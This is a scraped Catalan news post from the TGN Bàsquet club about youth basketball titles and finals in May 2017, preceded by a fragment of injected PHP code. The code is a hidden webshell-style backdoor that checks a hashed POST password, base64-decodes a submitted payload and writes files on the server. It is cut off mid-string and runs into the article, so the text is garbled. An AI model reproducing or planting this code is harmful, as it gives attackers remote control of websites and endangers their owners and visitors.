function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Dos campionats, un de Catalunya i l'altre de Barcelona, pels equips del TGN Bàsquet - Tgn Bàsquet Club -

Dos campionats, un de Catalunya i l’altre de Barcelona, pels equips del TGN Bàsquet

Updated: maig 29, 2017

El cap de setmana ha estat profitós pel TGN Bàsquet. Els equips del club han sumat dos nous títols al palmarès de l’entitat, ambdós molt importants però que poden no ser els últims perquè el pròxim cap de setmana hi ha més campionats d’alt nivell.

Així, l’aleví femení 06 va aconseguir el campionat de Catalunya escolar després de vèncer els tres rivals de la fase final que es va disputar al pavelló Xavi Tondo de Valls. El conjunt que entrena Juan Carlos Arjona va derrotar l’escola Monalco d’Igualada, l’Aula Europea de Barcelona i la Tecla Sala d’Hospitalet per idèntic resultat (12-4) —la normativa del campionat va ser diferent de les competicions federades; són partits de 4 parts de 10 minuts i la puntuació final dels partits és la suma dels 4 quarts de cada partit: 3 punts per quart guanyat, 2 punts per quart empat i 1 punt per quart perdut—.

Per la seva banda, el preinfantil femení que entrena Albert Gómez va aconseguir el campionat de Barcelona A2 en vèncer a la final el CB Cervera per 69-42. En quarts de final, el TGN Bàsquet va guanyar el CB Lleida (66-26) i en semifinals el Lliçà d’Amunt (69-29). Ara, l’equip lila jugarà pel campionat de Catalunya.

Amb la mel als llavis

Dos equips del club van estar a punt d’aconseguir els respectius títols de la demarcació de Tarragona però van perdre en la gran final. Així, l’infantil femení B va caure contra l’AB Vendrell al Sagrat Cor (39-43), en un partit en què les noies que dirigeix Agustí Oriol van començar molt nervioses, sense precisió en atac. El fet d’anar a remolc va condicionar el joc de les locals que, però, van reaccionar a còpia de coratge i lluita. El públic del TGN Bàsquet —hi havia una nombrosa presència també d’aficionats de l’AB Vendrell— va protestar molt les decisions arbitrals, que van considerar poc justes. En uns minuts finals molt emocionants, la victòria es va escapar. Al matí, el conjunt lila havia guanyat el Reus Deportiu a semifinals (58-46).

Idèntica sort va córrer el cadet masculí A, que va perdre de forma, però, clara, contra l’amfitrió de la seva final a quatre, el CB Àguiles (68-47). El conjunt local va ser molt superior en la final a partir del descans gràcies al seu encert, especialment des de la línia de tres punts (3 triples en 3 minuts al tercer quart) i va enfonsar les aspiracions del TGN Bàsquet de sumar el títol. En semifinals, els nois que entrena Javi García havien guanyat el Manyanet (48-40).

Per la seva banda, el cadet femení lila va quedar en tercera posició. L’equip que dirigeix Anna Berasategui va perdre en semifinals contra AB Cunit (57-52). El TGN Bàsquet, però, es va refer de la derrota i va vèncer el CBT en el partit pel tercer i quart lloc (50-53).

Malgrat les derrotes, cal assenyalar que el simple fet de jugar les fases finals ja és un reconeixement al mèrit i la feina feta pels equips del TGN Bàsquet, que enguany es troben disputant la majoria de títols de les lligues que disputen. Una tasca que cada vegada es tradueix en més finals a quatre i campionats.

Finalment, el benjamí masculí va jugar a Igualada, al Complex Esportiu Les Comes en una fase que va comptar amb diferents etapes dins la jornada. Així, es van disputar diferents partits sense puntuació i en un altre moment, proves d’habilitat basquetbolística. És aquesta una edat en què es pretén que els més petits gaudeixin del bàsquet sense que hi hagi un esperit competitiu.